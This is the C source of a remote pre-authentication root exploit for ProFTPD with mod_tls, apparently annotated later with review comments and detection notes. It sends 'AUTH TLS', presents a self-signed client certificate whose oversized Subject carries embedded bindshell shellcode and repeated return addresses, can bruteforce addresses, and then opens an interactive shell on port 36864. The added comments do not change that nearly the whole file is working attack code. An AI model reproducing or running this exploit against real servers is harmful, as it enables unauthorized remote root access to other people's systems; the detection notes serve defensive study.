===========================================================
ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
===========================================================
/*
* *** Anti-modTLS-0day version 2 ***
*
* ProFTPd *.*.* + mod_tls remote-root-0day-exploit
*
* main advantages of this exploit:
* 1) No patched mod_tls versions yet
* 2) This is a preauthentication bug
* 3) Bruteforcing option (eheheheee)
* main disadvantages:
* 2) The target mechanism isn't very good, because exploitation
* depends on the library's mapped address, so there are no
* strict categories.
* 1) Dunno, if there are a lot of proftpd+mod_tls boxes
* outta there.
*
* Bug found by: netris
* exploit written by: netris
*
* -- ADD --
*
* Hi there. Here goes the original exploit written in 2004
* (not in 2006 like some of you would guess), and found by
* netris, not Evgeny Legerov. Big middle fingers to those
* who fight for commercial security shit system.
* Greets to arpunk, pandzilla, c0dak, mcb, c0de, ^sq, disque,
* gamma, djang0 and many others of ex #phenoelit channel.
*
* netris.
*
* mailto: [email protected]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <getopt.h>
#include <netdb.h>
#include <openssl/ssl.h>
#include <openssl/ssl3.h>
#include <openssl/x509.h>
#include <openssl/err.h>
/* CODE_SZ is defined but never referenced in this file. */
#define CODE_SZ 2322
/* Default FTP control port used when no ":port" suffix is given. */
#define DPORT 21
/* Assemble a 32-bit value from four byte-sized operands into u (a is the most
 * significant byte). The operands are not parenthesised and the macro is not a
 * single statement, so it is only safe with simple arguments and inside a
 * braced block, which is how main() uses it. Because checkz() bounds each
 * byte to 0x7f, a*0x1000000 stays below INT_MAX. */
#define BSET(u,a,b,c,d) u = a*0x1000000;\
u+= b*0x0010000;\
u+= c*0x0000100;\
u+= d*0x0000001;
/* Clamp the first four elements of a[] into the range 0x20..0x7f.
 * NOTE(review): the macro declares `int i;` itself, so it can be expanded only
 * once per scope and only where a declaration is legal (main() relies on this
 * and must not declare its own i). */
#define checkz(a) int i;\
for(i=0;i<4;i++){\
if(a[i]<0x20)a[i]=0x20;\
if(a[i]>0x7f)a[i]=0x7f;\
}
/* ch: index into vict[] chosen on the command line (0 = bruteforce slot);
 * timeout: seconds handed to select() in senddata();
 * br: non-zero while bruteforcing; step() prints nothing while it is set. */
int ch,timeout=2,br=0;
/* One target entry: a human-readable label and the 32-bit value that
 * set_subject() repeats inside the certificate. A zero call_reg ends vict[]. */
struct ADDR{
char *os;
unsigned long call_reg; /* eax or edx */
};
/*bindshell, port 36864, offset 265, buf address is edx */
/* Opaque payload string (author's description above). Its only use in this
 * file is in set_subject(), which copies sizeof(shellcode)-1 bytes of it into
 * the certificate's Subject attribute. Defensive note: since it travels
 * verbatim inside the TLS client certificate, this exact string is a usable
 * signature for handshake inspection and server-side certificate logging. */
char shellcode[]="h22ImX522ImHRWPPSRPPaVUWWTBfRJfhdEfXf5YDfPDfh0PDTY09RUajWY"
"0Loa0toafhoXfYf1LocjxY0Loe0Toe0ToffhH0fYf1Loh0tojjFY0Lok0t"
"ok0tolfht9fXf1Don0TopjyX0Dor0TosjKX0Dou0Tov0ToxjIX0Doy0Toy"
"G0tozGGfhsCfYf1LozGG0tozGGjZY0LozGGjkX0Doz0TozGGjGX0Doz0To"
"zG0tozGGjAY0LozGf1tozGGG0tozGGjpY0LozG0tozGGjpY0LozG0TozGG"
"jfX0DozG0tozGGjRX0DozG0tozGG0TozGj8Y0Loz0tozG0TozGfhlGfYf1"
"LozGGGG0TozGG0TozGj3Y0Loz0tozG0tozGGjuX0DozG0TozGGjyY0LozG"
"0tozGGG0tozGj4Y0Loz0tozG0TozGjqX0Doz0tozG0tozGfhyCfXf1DozG"
"Gf1tozGGjFY0Loz0TozG0TozGjQY0LozGG0tozGj9Y0Loz0TozG0TozGjY"
"X0DozGG0tozGjFX0Doz0TozG0tozGGjnY0LozG0TozGGjTY0LozG0tozGj"
"gY0Loz0TozG0tozGGj4Y0LozG0TozGj9X0DozG0tozGfhKofYf1Lozf1to"
"zGG0tozGfha5fXf1Dozf1TozGGj4X0Doz0TozGjYY0LozGGGGjHY0LozCn"
"1qGvFXpvzvFxyvFqrNCOf26C9FcSwFR1T1jvFYOofvFfrNdvNjrNZOf2Gv"
"2KCCOf2LvVyvViOfC2KyMOFj629OnA2FOfA29wVivvXxkrK8O224xra54v"
"bingsh";
/* Forward declarations.
 * NOTE(review): handler() (defined below) has no prototype here and is
 * declared with an empty parameter list, yet main() passes it to signal(),
 * which expects void (*)(int). DUF_add_entry() takes unsigned char* while
 * set_subject() passes a char array, so a sign-mismatch warning is expected.
 * Several libc functions used later have no header in the include list
 * above: close()/read()/write() (<unistd.h>), inet_aton()/inet_addr()
 * (<arpa/inet.h>), isdigit() (<ctype.h>) and select() (<sys/select.h>); the
 * file builds only where implicit declarations are still tolerated. */
X509 *Create_Death_Certificate(EVP_PKEY **pkey);
void set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer);
void DUF_add_entry(X509_NAME **subiss, char *field,
unsigned char *bytes, int len);
void setaddr(char *hname, struct sockaddr_in *sap, int port);
void senddata(int sock, char *data);
int shell(char *host,int port, struct sockaddr_in ad);
void help(char *prname);
/* Globals: ctx is only used by main(); conn and sk are shared between main()
 * and the SIGINT handler, which tears them down. */
SSL_CTX *ctx;
SSL *conn;
int sk;
/* SIGINT handler installed by main() (also called directly from shell() when
 * its connect() fails outside bruteforce mode): shut down and free the
 * current SSL object unless a handshake is in progress, close the control
 * socket and exit.
 *
 * NOTE(review): conn is dereferenced without a NULL check although it stays
 * NULL until SSL_new() in main() has run; `conn->in_handshake` reads a member
 * of the SSL struct, which is opaque in OpenSSL 1.1.0 and later, so this does
 * not compile there; and SSL_shutdown()/SSL_free()/exit() are not
 * async-signal-safe. close() comes from <unistd.h>, which is not included. */
void handler(){
if(!conn->in_handshake){
SSL_shutdown(conn);
SSL_free(conn);
}
close(sk);
exit(0);
}
/* Progress/error reporting to stderr.
 *   err ==  0: numbered progress line "[NNN] str"; the counter persists
 *              across calls and starts at 1.
 *   err == -1: error line "[!!!] str".
 *   err ==  1: error line followed by the OpenSSL error queue.
 *   any other err: nothing is printed.
 * All output is suppressed while bruteforcing (global br != 0). */
void step(char *str, int err){
static int count;
if(br)
return;
if(err == 0){
fprintf(stderr,"[%03d] %s\n",count+1,str);
count++;
}else if(err == -1){
fprintf(stderr,"[!!!] %s\n",str);
}else if(err == 1){
fprintf(stderr,"[!!!] %s\n\t",str);
ERR_print_errors_fp(stderr);
}
}
/* Add targets here */
/* Target table. Entry 0 is the bruteforce slot: main() rewrites its call_reg
 * on every iteration, and its initial value is the bruteforce start when no
 * -b option is given. The {0} terminator gives call_reg == 0, which is what
 * help() stops on. */
struct ADDR vict[]={
{"Bruteforce mode",0x40202020},
{"Gentoo Linux 1.4 3.2.3-r1 - openssl-0.9.7d",0x40235727},
{"Gentoo Linux 1.4.3.2.3-r1 - default install",0x40283a43},
{0}
};
/* Entry point: parse options, resolve the target, then (once for a fixed
 * target, repeatedly in bruteforce mode) open an FTP control connection,
 * send "AUTH TLS", and run a TLS handshake presenting the certificate built
 * by Create_Death_Certificate(); afterwards shell() tries TCP port 36864.
 *
 * Options (see help()): -t seconds for senddata()'s select() timeout,
 * -b 0xADDR bruteforce start value, -x print the certificate and exit.
 * Positional arguments: target index into vict[] (0 = bruteforce) and
 * host[:port].
 *
 * Defensive note: every attempt is observable as an FTP session that issues
 * AUTH TLS and then presents a client certificate with a multi-kilobyte
 * Subject; bruteforce mode repeats this in a tight loop against one host,
 * and each attempt is followed by a connect() to port 36864. */
int main(int argc, char *argv[])
{
int port=DPORT,aa[4];
/* NOTE(review): getopt() returns int; storing it in a char makes the
 * `!= -1` test below never true on targets where char is unsigned. */
char *host,*sport,opt;
unsigned long saddr=0;
struct sockaddr_in a;
EVP_PKEY *key;
X509 *cert=NULL;
fprintf(stderr,"--< rebel-proftpd-modtls-0day\n");
fprintf(stderr,"--< netris @ duffsrebelz\n\n");
while((opt=getopt(argc,(void*)argv,"+b:t:x"))!=-1)
switch(opt){
case 't':timeout=atoi(optarg);break;
/* NOTE(review): "%x" expects unsigned int*, but saddr is unsigned long;
 * "%lx" is the matching conversion. */
case 'b':sscanf(optarg,"0x%x",&saddr);break;
/* -x: build the certificate for target 1, dump it to stderr and exit. */
case 'x':ch=1;
X509_print_fp(stderr,
Create_Death_Certificate(&key));
exit(0);
default:help(argv[0]);
}
if(argc-optind!=2)
help(argv[0]);
/* NOTE(review): ch is never range-checked against vict[]; set_subject()
 * indexes vict[ch] directly. */
ch=atoi(argv[optind]);
/* Optional ":port" suffix on the host argument. isdigit() needs <ctype.h>,
 * which is not included. */
if(host=strchr(argv[optind+1],':')){
if(!isdigit(*(host+1))){
step("weird arguments\n",-1);
exit(-1);
}
host = strtok(argv[optind+1],":");
sport = strtok(NULL,":");
port=atoi(sport);
}else
host=argv[optind+1];
/* Target 0 is the bruteforce slot. */
(ch==0)?(br=1):(br=0);
SSL_library_init();
if(br)
fprintf(stderr,
"--< Ready, Steady, GO!!! >:O\n\n");
setaddr(host,&a,port);
/* Bruteforce start value: -b if given, else vict[0].call_reg. Split into
 * bytes (aa[0] most significant) and clamp each into 0x20..0x7f. */
if(!saddr)saddr=vict[0].call_reg;
aa[3] = (saddr >> 0) & 0xff;
aa[2] = (saddr >> 8) & 0xff;
aa[1] = (saddr >> 16) & 0xff;
aa[0] = (saddr >> 24) & 0xff;
checkz(aa);
/* Nested counters over aa[1..3]; aa[0] never changes. The outer for(;;)
 * never ends on its own: the only ways out are the exit() calls in the
 * body. For a fixed target (ch != 0) a failed shell() connect calls
 * handler() and exits, so only bruteforce mode actually iterates. */
for(;;){
for(;aa[1]<0x7e;aa[1]++){
for(;aa[2]<0x7e;aa[2]++){
for(;aa[3]<0x7e;aa[3]++){
BSET(vict[0].call_reg,aa[0],aa[1],aa[2],aa[3]);
/* NOTE(review): call_reg is unsigned long; "%08x" should be "%08lx". */
fprintf(stderr,"[0x%08x]\n",vict[0].call_reg);
/* NOTE(review): sk is never closed on the normal path below (SSL_free()
 * does not close the descriptor), so one socket leaks per iteration. */
sk = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
/* A fresh self-signed certificate with a new RSA key on every attempt. */
cert = Create_Death_Certificate(&key);
a.sin_port=htons(port);
a.sin_family=AF_INET;
if((connect(sk,(struct sockaddr*)&a,sizeof(a)))<0){
fprintf(stderr,"[!!!] couldn't connect\n\n");
close(sk);
exit(-1);
}
/* FTP "AUTH TLS"; senddata() drains the reply until the timeout. */
senddata(sk,"AUTH TLS\n");
/* NOTE(review): a new SSL_CTX is created per iteration and never freed;
 * key is never freed either. */
ctx = SSL_CTX_new(SSLv23_client_method());
SSL_CTX_use_certificate(ctx, cert);
SSL_CTX_use_PrivateKey(ctx, key);
conn = SSL_new(ctx);
SSL_set_connect_state(conn);
SSL_set_fd(conn,sk);
signal(SIGINT,handler);
step("establishing SSL connection",0);
#ifdef DEBUG
getc(stdin);
#endif
/* NOTE(review): SSL_connect() returns 1 on success and 0 on a controlled
 * shutdown; only a negative result is treated as failure here, and that
 * failure exits even in bruteforce mode. */
if(SSL_connect(conn)<0){
fprintf(stderr,"[!!!] No SSL enabled on %s\n\n",host);
exit(-1);
}
step("shell spawn...",0);
/* shell() returns 1 once the user ends the session; it returns 0 only in
 * bruteforce mode when port 36864 did not accept the connection. */
if(shell(host,36864,a))
exit(0);
step("done, see ya later\n",0);
X509_free(cert);
/* NOTE(review): direct access to the SSL struct's in_handshake member; the
 * struct is opaque in OpenSSL 1.1.0+, so this does not compile there. */
if(!conn->in_handshake){
SSL_shutdown(conn);
SSL_free(conn);
}
/* Reset each exhausted counter to 0x20 and carry into the next one. */
}aa[3]=0x20;
}aa[2]=0x20;
}aa[1]=0x20;
}
return 0;
}
/* Build a self-signed X509 v3 certificate (serial 1, MD5 signature) over a
 * freshly generated 1024-bit RSA key, with the Subject filled in by
 * set_subject(), and return it. The key is handed back through *key.
 * The caller owns both the certificate and the key (main() frees only the
 * certificate). None of the OpenSSL return values are checked.
 *
 * @param key  receives the new EVP_PKEY
 * @return     the new X509 */
X509 *Create_Death_Certificate(EVP_PKEY **key)
{
/* NOTE(review): fd is never assigned, yet close(fd) is called at the end.
 * close() takes an int and fd is an uninitialised FILE*, so that call is
 * undefined behaviour (at best it closes an arbitrary descriptor). */
FILE *fd;
time_t t;
/* Both stay NULL: set_subject() receives them by value and fetches the real
 * names from the certificate itself, so X509_NAME_free(subject) below is
 * called on NULL (a no-op). */
X509_NAME *subject=NULL;
X509_NAME *issuer=NULL;
ASN1_TIME *tbefore,*tafter;
ASN1_INTEGER *serial;
X509 *dz; /* certificate */
RSA *rsa;
EVP_PKEY *pk;
step("preparing dirty certificate",0);
dz = X509_new();
/* private-key generation */
pk = EVP_PKEY_new();
/* NOTE(review): RSA_generate_key() is the old non-BIGNUM interface,
 * deprecated in later OpenSSL releases; its result is not NULL-checked. */
rsa = RSA_generate_key(1024, RSA_F4, NULL,NULL);
EVP_PKEY_assign_RSA(pk,rsa);
X509_set_pubkey(dz,pk);
/* version/serial */
X509_set_version(dz,0x2); /* version: 3 */
serial = ASN1_INTEGER_new();
ASN1_INTEGER_set(serial,0x01);
X509_set_serialNumber(dz, serial);
/* not-before/notafter validity: from the Unix epoch to 65 years of 366
 * days after it. The product is evaluated in int and fits
 * (2,055,456,000 < INT_MAX). */
tbefore = ASN1_TIME_new();
tafter = ASN1_TIME_new();
ASN1_TIME_set(tbefore,t=0);
ASN1_TIME_set(tafter,t=60*60*24*366*65);
X509_set_notBefore(dz, tbefore);
X509_set_notAfter(dz, tafter);
/* DN Subject/Issuer */
set_subject(dz,subject,issuer);
/* let's make it self signed (with an MD5 digest) */
X509_sign(dz, pk, EVP_md5());
*key=pk;
X509_NAME_free(subject);
ASN1_INTEGER_free(serial);
ASN1_TIME_free(tbefore);
ASN1_TIME_free(tafter);
close(fd);
return dz;
}
/* <soletario> yeah man */
/* Fill the certificate's Subject with one oversized "host" attribute and
 * remove the Issuer's first entry. A 6000-byte stack buffer is prepared as
 * follows: bytes 0..4998 are 'E'; shellcode[] (minus its NUL) is copied in
 * at offset 258; from one byte past it up to offset 3200 the 4-byte value
 * vict[ch].call_reg is repeated in little-endian order. Byte 4999 onward
 * stays zero, so the -1 length given to DUF_add_entry() (strlen) inserts
 * 4999 bytes.
 *
 * NOTE(review): the subject/issuer parameters are passed by value and then
 * overwritten, so the caller's pointers are never updated; vict[ch] is
 * indexed without any bounds check on ch.
 *
 * Defensive note: the resulting certificate — a ~5 KB Subject attribute
 * dominated by 0x45 ('E') bytes — is the concrete artifact a TLS-inspecting
 * sensor or server-side client-certificate logging can flag. */
void set_subject(X509 *cert, X509_NAME *subject, X509_NAME *issuer)
{
int i;
char dc0de[6000];
memset(dc0de,0,sizeof(dc0de));
for(i=0; i<5000-1; i++)
dc0de[i]='E';
/* NOTE(review): sizeof yields size_t, so this condition is a signed/unsigned
 * comparison; harmless here because i is always positive. */
for(i=258; i<258+sizeof(shellcode)-1; i++)
dc0de[i]=shellcode[i-258];
i+=1;
for(; i<3200; i+=4){ /* uhh, rude */
dc0de[i+0]=(vict[ch].call_reg >> 0) & 0xff;
dc0de[i+1]=(vict[ch].call_reg >> 8) & 0xff;
dc0de[i+2]=(vict[ch].call_reg >>16) & 0xff;
dc0de[i+3]=(vict[ch].call_reg >>24) & 0xff;
}
/* Use the certificate's own name objects (presumably still empty on a
 * freshly created X509); the parameters are discarded. */
subject = X509_get_subject_name(cert);
issuer = X509_get_issuer_name(cert);
/* len = -1: ASN1_mbstring_ncopy() takes strlen(dc0de). */
DUF_add_entry(&subject,"host",dc0de,-1);
X509_set_subject_name(cert,subject);
/* NOTE(review): if the issuer name has no entries yet this delete is a
 * no-op (returns NULL) — verify against the OpenSSL version in use. */
X509_NAME_delete_entry(issuer,0);
X509_set_issuer_name(cert,issuer);
}
/* This function can insert large fields */
/* Append one attribute named `field` (looked up with OBJ_txt2obj) carrying
 * `bytes` to the X509_NAME *subiss. With len == -1, ASN1_mbstring_ncopy()
 * uses strlen(bytes), which is how set_subject() inserts its oversized
 * value. subiss is only dereferenced, never reassigned, so a plain
 * X509_NAME* would do.
 *
 * NOTE(review): `ne->value` pokes into X509_NAME_ENTRY directly; that struct
 * is opaque in OpenSSL 1.1.0 and later, so this does not compile there
 * (X509_NAME_ENTRY_set_data() is the accessor). OBJ_txt2obj() may return
 * NULL for an unknown field name, no return value is checked, and since
 * X509_NAME_add_entry() stores a copy of ne, the entry allocated here is
 * never freed. */
void DUF_add_entry(X509_NAME **subiss, char *field,
unsigned char *bytes, int len)
{
ASN1_OBJECT *obj;
X509_NAME_ENTRY *ne;
ne=X509_NAME_ENTRY_new();
obj=OBJ_txt2obj(field,0);
X509_NAME_ENTRY_set_object(ne,obj);
ASN1_mbstring_ncopy(&ne->value,bytes,len,MBSTRING_ASC,0,0,0);
X509_NAME_add_entry(*subiss,ne,-1,0);
}
/* Fill *sap with the IPv4 address of hname (dotted quad or DNS name) and the
 * given port. If the name cannot be resolved a message is printed via step()
 * and the function returns early: *sap is then zeroed except sin_family, and
 * the port is NOT set. */
void setaddr(char *hname, struct sockaddr_in *sap, int port)
{
memset(sap,0,sizeof(*sap));
sap->sin_family = AF_INET;
if(inet_aton(hname,&sap->sin_addr)){
/* numeric address: re-parse with inet_addr (same value for a valid quad) */
sap->sin_addr.s_addr = inet_addr(hname);
}else{
struct hostent *he = gethostbyname(hname);
if(!he){
step("unkown host",-1);
return;
}
/* first address of the result; h_addr is the first h_addr_list entry */
memcpy(&sap->sin_addr, he->h_addr, sizeof(sap->sin_addr));
}
sap->sin_port = htons(port);
}
/* Interactive relay to a TCP service on host:port (main() passes 36864, the
 * port named in the payload comment): stdin is forwarded to the socket and
 * the socket's output is printed on stderr, until a line containing "exit"
 * is typed.
 *
 * @return 1 when the user typed "exit"; 0 when connect() fails in bruteforce
 *         mode (br). Outside bruteforce mode a failed connect() calls
 *         handler(), which exits the process, so this never returns then.
 *
 * NOTE(review): read() results are ignored and buf is NUL-terminated only by
 * the memset, so a full 4096-byte read leaves it unterminated and the
 * following fprintf("%s")/strstr()/strlen() run past the buffer. A peer
 * close (read() == 0) is never detected, so the loop spins on the prompt.
 * select() is called with nfds 255 rather than sock+1 and therefore only
 * works while sock < 255. close()/read()/write() need <unistd.h>.
 *
 * Defensive note: a connect() to port 36864 immediately after the TLS
 * handshake is the post-exploitation indicator; a new listener on that port
 * on an FTP host is what to alert on. */
int shell(char *host, int port, struct sockaddr_in ad)
{
u_char buf[4096];
fd_set fds;
int sock;
struct sockaddr_in a=ad; /* local copy; only the port is changed */
sock = socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
a.sin_family = AF_INET;
a.sin_port = htons(port);
if((connect(sock,(struct sockaddr*)&a,sizeof(a)))<0){
step("couldn't connect\n",-1);
close(sock);
if(!br)
handler(); /* exits the process */
else return 0;
}
/* Ctrl-C is ignored from here on; the session ends by typing "exit". */
signal(SIGINT,SIG_IGN);
fprintf(stderr,"\n--< %s just has been 0wned\n\n",host);
for (;;){
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
fprintf(stderr,"\033[31m[duffshell]#\033[0m "); /* red prompt */
select(255, &fds, NULL, NULL, NULL);
memset(buf, 0, sizeof(buf));
if (FD_ISSET(sock, &fds)){
read(sock, buf, sizeof(buf));
fprintf(stderr, "%s", buf);
}
if (FD_ISSET(0, &fds)){
read(0, buf, sizeof(buf));
/* any input line containing "exit" ends the session */
if(strstr(buf,"exit")){
fprintf(stderr,"\n");
return 1;
}
write(sock, buf, strlen(buf));
}
}
}
/* Send the NUL-terminated string data on sock, then drain the reply one byte
 * at a time until either select() reports nothing readable within the
 * global `timeout` seconds (plus 30 us) or read() returns 0/-1. A select()
 * error (-1) does not stop the loop; only a 0 result does. The fd_set and
 * timeval are set up once and not reinitialised between iterations. A NULL
 * data pointer makes this a no-op. Return values of send() are ignored. */
void senddata(int sock, char *data)
{
fd_set readable;
struct timeval wait;
int scratch=0;
FD_ZERO(&readable);
FD_SET(sock,&readable);
wait.tv_sec = timeout;
wait.tv_usec = 30;
if(!data)
return;
send(sock,data,strlen(data),0);
while(select(sock+1,&readable,NULL,NULL,&wait) != 0){
if(read(sock,&scratch,1) <= 0)
break;
}
}
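/* Print the usage line, the option summary and the target table to stderr,
 * then terminate the process with exit(-1). Never returns.
 *
 * @param prname  program name (argv[0]) shown in the usage line */
void help(char *prname)
{
fprintf(stderr,"usage: %s target hostname:[port]\n",prname);
fprintf(stderr," -t <delay> :delay of data send/recv\n");
fprintf(stderr," -b <addr> :bruteforce starting address\n");
fprintf(stderr," -x :just the payload certificate and exit\n");
fprintf(stderr,"current targets:\n");
/* vict[] is terminated by an entry whose call_reg is 0. call_reg is an
 * unsigned long, so the conversion must be %lx; the previous %x was a
 * format/argument mismatch (undefined behaviour on LP64 targets). */
for(int i=0;vict[i].call_reg;i++)
fprintf(stderr," %d) %s ( %08lx )\n",i,
vict[i].os,
vict[i].call_reg);
putc('\n',stderr);
exit(-1);
}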